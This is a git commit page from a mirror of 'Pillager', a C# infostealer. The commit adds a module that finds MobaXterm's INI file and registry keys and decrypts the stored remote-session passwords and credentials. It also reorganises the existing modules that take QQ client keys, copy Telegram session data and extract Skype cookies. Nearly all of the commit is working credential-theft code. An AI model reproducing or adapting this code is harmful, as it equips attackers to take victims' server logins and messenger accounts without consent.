qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add MobaXterm

This commit is contained in:
簞純 2023-10-26 15:37:40 +08:00
parent 8735f0a36d
commit 6253a55900
8 changed files with 1607 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1176
Pillager/Helper/Pixini.cs Normal file
View File

File diff suppressed because it is too large Load Diff

8
Pillager/IM/QQ.cs → Pillager/Messengers/QQ.cs
View File

@ -3,11 +3,11 @@ using System.IO;
using System.Net;
using System.Text;
namespace Pillager.IM
namespace Pillager.Messengers
{
internal class QQ
{
public static string IMName = "QQ";
public static string MessengerName = "QQ";
public static string get_pt_local_token()
{
@ -136,12 +136,12 @@ namespace Pillager.IM
string link = get_link(clientkey, uin);
if (link == "") return;
string savepath = Path.Combine(path, IMName);
string savepath = Path.Combine(path, MessengerName);
Directory.CreateDirectory(savepath);
StringBuilder sb = new StringBuilder();
sb.AppendLine("QQ:" + uin);
sb.AppendLine("Mail:" + link);
File.WriteAllText(Path.Combine(savepath, IMName + "_ClientKey.txt"), sb.ToString());
File.WriteAllText(Path.Combine(savepath, MessengerName + "_ClientKey.txt"), sb.ToString());
}
catch { }
}

22
Pillager/IM/Skype.cs → Pillager/Messengers/Skype.cs
View File

@ -3,13 +3,13 @@ using System;
using System.IO;
using System.Text;
namespace Pillager.IM
namespace Pillager.Messengers
{
internal class Skype
{
public static string IMName = "Skype";
public static string MessengerName = "Skype";
public static string[] IMPaths = new string[]
public static string[] MessengerPaths = new string[]
{
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"Microsoft\\Skype for Desktop"),
@ -17,10 +17,10 @@ namespace Pillager.IM
"Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\Roaming\\Microsoft\\Skype for Store")
};
public static string Skype_cookies(string IMPath)
public static string Skype_cookies(string MessengerPath)
{
StringBuilder cookies = new StringBuilder();
string skype_cookies_path = Path.Combine(IMPath, "Network\\Cookies");
string skype_cookies_path = Path.Combine(MessengerPath, "Network\\Cookies");
if (!File.Exists(skype_cookies_path)) return null;
try
{
@ -54,13 +54,13 @@ namespace Pillager.IM
{
try
{
if (!Directory.Exists(IMPaths[0]) && !Directory.Exists(IMPaths[1])) return;
string savepath = Path.Combine(path, IMName);
if (!Directory.Exists(MessengerPaths[0]) && !Directory.Exists(MessengerPaths[1])) return;
string savepath = Path.Combine(path, MessengerName);
Directory.CreateDirectory(savepath);
string Desktop = Skype_cookies(IMPaths[0]);
string Store = Skype_cookies(IMPaths[1]);
if (!String.IsNullOrEmpty(Desktop)) File.WriteAllText(Path.Combine(savepath, IMName + "_Desktop.txt"), Desktop);
if (!String.IsNullOrEmpty(Store)) File.WriteAllText(Path.Combine(savepath, IMName + "_Store.txt"), Store);
string Desktop = Skype_cookies(MessengerPaths[0]);
string Store = Skype_cookies(MessengerPaths[1]);
if (!String.IsNullOrEmpty(Desktop)) File.WriteAllText(Path.Combine(savepath, MessengerName + "_Desktop.txt"), Desktop);
if (!String.IsNullOrEmpty(Store)) File.WriteAllText(Path.Combine(savepath, MessengerName + "_Store.txt"), Store);
}
catch { }
}

14
Pillager/IM/Telegram.cs → Pillager/Messengers/Telegram.cs
View File

@ -1,20 +1,20 @@
using System;
using System.IO;
namespace Pillager.IM
namespace Pillager.Messengers
{
internal class Telegram
{
public static string IMName = "Telegram";
public static string MessengerName = "Telegram";
public static string IMPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Telegram Desktop");
public static string MessengerPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Telegram Desktop");
public static void Save(string path)
{
try
{
if (!Directory.Exists(IMPath)) return;
string savepath = Path.Combine(path, IMName);
if (!Directory.Exists(MessengerPath)) return;
string savepath = Path.Combine(path, MessengerName);
Directory.CreateDirectory(savepath);
string[] sessionpaths =
{
@ -38,9 +38,9 @@ namespace Pillager.IM
Directory.CreateDirectory(savepath + "\\tdata\\0CA814316818D8F6");
foreach (var sessionpath in sessionpaths)
{
if (File.Exists(Path.Combine(IMPath, sessionpath)))
if (File.Exists(Path.Combine(MessengerPath, sessionpath)))
{
File.Copy(Path.Combine(IMPath, sessionpath), Path.Combine(savepath, sessionpath), true);
File.Copy(Path.Combine(MessengerPath, sessionpath), Path.Combine(savepath, sessionpath), true);
}
}
}

9
Pillager/Pillager.csproj
View File

@ -47,6 +47,7 @@
<Compile Include="Helper\BCrypt.cs" />
<Compile Include="Browsers\Chrome.cs" />
<Compile Include="Helper\decryptMoz3DES.cs" />
<Compile Include="Helper\Pixini.cs" />
<Compile Include="Helper\LockedFile.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\models.cs" />
@ -55,12 +56,13 @@
<Compile Include="Helper\Pbkdf2.cs" />
<Compile Include="Helper\TripleDESHelper.cs" />
<Compile Include="Helper\VaultCli.cs" />
<Compile Include="IM\QQ.cs" />
<Compile Include="IM\Skype.cs" />
<Compile Include="IM\Telegram.cs" />
<Compile Include="Messengers\QQ.cs" />
<Compile Include="Messengers\Skype.cs" />
<Compile Include="Messengers\Telegram.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Helper\SQLiteHandler.cs" />
<Compile Include="Tools\MobaXterm.cs" />
<Compile Include="ZIP\CompressionLevel.cs" />
<Compile Include="ZIP\ShellHelper.cs" />
<Compile Include="ZIP\ZipArchive.cs" />
@ -71,5 +73,6 @@
<ItemGroup>
<None Include="app.config" />
</ItemGroup>
<ItemGroup />
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

10
Pillager/Program.cs
View File

@ -3,7 +3,8 @@ using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using Pillager.Browsers;
using Pillager.IM;
using Pillager.Messengers;
using Pillager.Tools;
namespace Pillager
{
@ -17,12 +18,15 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
//IM
//Tools
MobaXterm.Save(savepath);
//Messengers
QQ.Save(savepath);
Telegram.Save(savepath);
Skype.Save(savepath);
//Browser
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
FireFox.Save(savepath);

380
Pillager/Tools/MobaXterm.cs Normal file
View File

@ -0,0 +1,380 @@
using Microsoft.Win32;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
namespace Pillager.Tools
{
internal class MobaXterm
{
public static string ToolName = "MobaXterm";
public static string FromINI(List<string> pathlist)
{
StringBuilder stringBuilder = new StringBuilder();
foreach (var path in pathlist)
{
try
{
var p = Pixini.Load(path);
string SessionP = p.Get("SessionP", "Misc", "");
if (string.IsNullOrEmpty(SessionP)) continue;
string Sesspasses = p.Get((Environment.UserName + "@" + Environment.MachineName).Replace(" ",""), "Sesspass", "");
List<IniLine> passwords;
List<string> passwordlist = new List<string>();
p.sectionMap.TryGetValue("passwords", out passwords);
if (passwords!=null)
{
foreach (var password in passwords)
{
string key = password.key;
string value = password.value;
try
{
if (string.IsNullOrEmpty(Sesspasses))
{
string decryptvalue = DecryptWithoutMP(SessionP, value);
passwordlist.Add(key + "=" + decryptvalue);
}
else
{
string decryptvalue = DecryptWithMP(SessionP, Sesspasses, value);
passwordlist.Add(key + "=" + decryptvalue);
}
}
catch { }
}
}
List<IniLine> credentials;
List<string> credentiallist = new List<string>();
p.sectionMap.TryGetValue("credentials", out credentials);
if (credentials!=null)
{
foreach (var credential in credentials)
{
string name = credential.key;
string value = credential.value;
try
{
string username = value.Split(':')[0];
if (string.IsNullOrEmpty(Sesspasses))
{
string decryptvalue = DecryptWithoutMP(SessionP, value.Split(':')[1]);
credentiallist.Add(name + "=" + username + ":" + decryptvalue);
}
else
{
string decryptvalue = DecryptWithMP(SessionP, Sesspasses, value.Split(':')[1]);
credentiallist.Add(name + "=" + username + ":" + decryptvalue);
}
}
catch { }
}
}
if (passwordlist?.Count > 0)
{
stringBuilder.AppendLine("Passwords:");
foreach (var password in passwordlist)
{
stringBuilder.AppendLine(password);
}
stringBuilder.AppendLine("");
}
if (credentiallist?.Count > 0)
{
stringBuilder.AppendLine("Credentials:");
foreach (var credential in credentiallist)
{
stringBuilder.AppendLine(credential);
}
stringBuilder.AppendLine("");
}
}
catch { }
}
return stringBuilder.ToString();
}
public static string FromRegistry()
{
StringBuilder stringBuilder = new StringBuilder();
List<string> passwordlist = new List<string>();
List<string> credentiallist = new List<string>();
try
{
RegistryKey MobaXtermkey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Mobatek\\MobaXterm");
string SessionP = (string)MobaXtermkey.GetValue("SessionP");
string masterpassword = "";
try
{
string temp = Environment.UserName + "@" + Environment.MachineName;
masterpassword = (string)MobaXtermkey.OpenSubKey("M").GetValue(temp.Replace(" ",""));
}
catch { }
try
{
foreach (string SubkeyName in MobaXtermkey.OpenSubKey("P").GetValueNames())
{
try
{
string key = SubkeyName;
string value = (string)MobaXtermkey.OpenSubKey("P").GetValue(SubkeyName);
if (string.IsNullOrEmpty(masterpassword))
{
string decryptvalue = DecryptWithoutMP(SessionP, value);
passwordlist.Add(key + "=" + decryptvalue);
}
else
{
string decryptvalue = DecryptWithMP(SessionP, masterpassword, value);
passwordlist.Add(key + "=" + decryptvalue);
}
}
catch { }
}
}
catch { }
try
{
foreach (string SubkeyName in MobaXtermkey.OpenSubKey("C").GetValueNames())
{
try
{
string key = SubkeyName;
string value = (string)MobaXtermkey.OpenSubKey("C").GetValue(SubkeyName);
if (string.IsNullOrEmpty(masterpassword))
{
string decryptvalue = DecryptWithoutMP(SessionP, value);
credentiallist.Add(key + "=" + decryptvalue);
}
else
{
string decryptvalue = DecryptWithMP(SessionP, masterpassword, value);
credentiallist.Add(key + "=" + decryptvalue);
}
}
catch { }
}
}
catch { }
if (passwordlist?.Count > 0)
{
stringBuilder.AppendLine("Passwords:");
foreach (var password in passwordlist)
{
stringBuilder.AppendLine(password);
}
stringBuilder.AppendLine("");
}
if (credentiallist?.Count > 0)
{
stringBuilder.AppendLine("Credentials:");
foreach (var credential in credentiallist)
{
stringBuilder.AppendLine(credential);
}
stringBuilder.AppendLine("");
}
return stringBuilder.ToString();
}
catch { }
return null;
}
public static string DecryptWithMP(string SessionP, string Sesspasses, string Ciphertext)
{
byte[] bytes = Convert.FromBase64String(Sesspasses);
//byte[] key = KeyCrafter(SessionP);
byte[] front = new byte[] { 0x01, 0x00, 0x00, 0x00, 0xd0, 0x8c, 0x9d, 0xdf, 0x01, 0x15, 0xd1, 0x11, 0x8c, 0x7a, 0x00, 0xc0, 0x4f, 0xc2, 0x97, 0xeb };
byte[] all = new byte[bytes.Length + front.Length];
for (int i = 0; i < front.Length; i++)
{
all[i] = front[i];
}
for (int i = 0; i < bytes.Length; i++)
{
all[front.Length + i] = bytes[i];
}
byte[] temp = ProtectedData.Unprotect(all, Encoding.UTF8.GetBytes(SessionP), DataProtectionScope.CurrentUser);
string temp2 = Encoding.UTF8.GetString(temp);
byte[] output = Convert.FromBase64String(temp2);
byte[] text = Convert.FromBase64String(Ciphertext);
byte[] aeskey = new byte[32];
Array.Copy(output, aeskey, 32);
byte[] temp3 = new byte[16];
byte[] ivbytes = AESEncrypt(temp3, aeskey);
byte[] iv = new byte[16];
Array.Copy(ivbytes, iv, 16);
string t1 = AESDecrypt(text, aeskey, iv);
return t1;
}
public static string DecryptWithoutMP(string SessionP, string Ciphertext)
{
byte[] key = KeyCrafter(SessionP);
byte[] text = Encoding.ASCII.GetBytes(Ciphertext);
List<byte> bytes1 = new List<byte>();
for (int i = 0; i < text.Length; i++)
{
if (key.ToList().Contains(text[i]))
{
bytes1.Add(text[i]);
}
}
byte[] ct = bytes1.ToArray();
List<byte> ptarray = new List<byte>();
if (ct.Length % 2 == 0)
{
List<byte> bytes2 = new List<byte>();
for (int i = 0; i < ct.Length; i += 2)
{
int l = key.ToList().FindIndex(a => a == ct[i]);
key = RightBytes(key);
int h = key.ToList().FindIndex(a => a == ct[i + 1]);
key = RightBytes(key);
ptarray.Add((byte)(16 * h + l));
}
byte[] pt = ptarray.ToArray();
return Encoding.UTF8.GetString(pt);
}
return "";
}
public static byte[] RightBytes(byte[] input)
{
byte[] bytes = new byte[input.Length];
for (int i = 0; i < input.Length-1; i++)
{
bytes[i + 1] = input[i];
}
bytes[0] = input[input.Length - 1];
return bytes;
}
public static List<string> GetINI()
{
List<string> pathlist = new List<string>();
foreach (var process in Process.GetProcesses())
{
if (process.ProcessName.Contains(ToolName))
{
try
{
pathlist.Add(Path.Combine(Path.GetDirectoryName(process.MainModule.FileName), "MobaXterm.ini"));
}
catch { }
}
}
string installedpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MobaXterm\\MobaXterm.ini");
if (File.Exists(installedpath)) { pathlist.Add(installedpath); }
return pathlist;
}
private static string AESDecrypt(byte[] encryptedBytes, byte[] bKey, byte[] iv)
{
MemoryStream mStream = new MemoryStream(encryptedBytes);
RijndaelManaged aes = new RijndaelManaged();
aes.Mode = CipherMode.CFB;
aes.FeedbackSize = 8;
aes.Padding = PaddingMode.Zeros;
aes.Key = bKey;
aes.IV = iv;
CryptoStream cryptoStream = new CryptoStream(mStream, aes.CreateDecryptor(), CryptoStreamMode.Read);
try
{
byte[] tmp = new byte[encryptedBytes.Length + 32];
int len = cryptoStream.Read(tmp, 0, encryptedBytes.Length + 32);
byte[] ret = new byte[len];
Array.Copy(tmp, 0, ret, 0, len);
return Encoding.UTF8.GetString(ret);
}
finally
{
cryptoStream.Close();
mStream.Close();
aes.Clear();
}
}
private static byte[] AESEncrypt(byte[] plainBytes, byte[] bKey)
{
MemoryStream mStream = new MemoryStream();
RijndaelManaged aes = new RijndaelManaged();
aes.Mode = CipherMode.ECB;
aes.Padding = PaddingMode.PKCS7;
aes.Key = bKey;
CryptoStream cryptoStream = new CryptoStream(mStream, aes.CreateEncryptor(), CryptoStreamMode.Write);
try
{
cryptoStream.Write(plainBytes, 0, plainBytes.Length);
cryptoStream.FlushFinalBlock();
return mStream.ToArray();
}
finally
{
cryptoStream.Close();
mStream.Close();
aes.Clear();
}
}
public static byte[] KeyCrafter(string SessionP)
{
while (SessionP.Length < 20)
{
SessionP += SessionP;
}
string s1 = SessionP;
string s2 = Environment.UserName + Environment.UserDomainName;
while (s2.Length < 20)
{
s2 += s2;
}
string[] key_space = { s1.ToUpper(), s1.ToUpper(), s1.ToLower(), s1.ToLower() };
byte[] key = Encoding.UTF8.GetBytes("0d5e9n1348/U2+67");
for (int i = 0; i < key.Length; i++)
{
byte b = (byte)key_space[(i + 1) % (key_space).Length][i];
if (!key.Contains(b) && Encoding.UTF8.GetBytes("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/").Contains(b))
{
key[i] = b;
}
}
return key;
}
public static void Save(string path)
{
try
{
List<string> pathlist=GetINI();
if (pathlist.Count==0) return;
string savepath = Path.Combine(path, ToolName);
Directory.CreateDirectory(savepath);
string registryout = FromRegistry();
string iniout = FromINI(pathlist);
string output = registryout + iniout;
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
}
catch { }
}
}
}

28
README.md
View File

@ -11,18 +11,18 @@
目前支持:
| Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings |
| :------------ | :-------: | :-----: | :-------: | :------: | :------: | :------: |
| IE | ✅ | ❌ | ✅ | ✅ | ❌ | ❌ |
| Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| Brave-Browser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| QQBrowser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| SogouExplorer | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| Vivaldi | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| CocCoc | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ |
| :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: |
| IE | ✅ | ❌ | ✅ | ✅ | | |
| Edge | ✅ | ✅ | ✅ | ✅ | | |
| Chrome | ✅ | ✅ | ✅ | ✅ | | |
| Chrome Beta | ✅ | ✅ | ✅ | ✅ | | |
| Chromium | ✅ | ✅ | ✅ | ✅ | | |
| Brave-Browser | ✅ | ✅ | ✅ | ✅ | | |
| QQBrowser | ✅ | ✅ | ✅ | ✅ | | |
| SogouExplorer | ✅ | ✅ | ✅ | ✅ | | |
| Vivaldi | ✅ | ✅ | ✅ | ✅ | | |
| CocCoc | ✅ | ✅ | ✅ | ✅ | | |
| FireFox | ✅ | ✅ | ✅ | ✅ | | |
| IM | Support |
| -------- | ------------------ |
@ -30,6 +30,10 @@
| Telegram | tdata |
| Skype | Token |
| Tool | Support |
| --------- | ------------------- |
| MobaXterm | Password/Credential |
后续将会陆续添加支持的软件
## 优点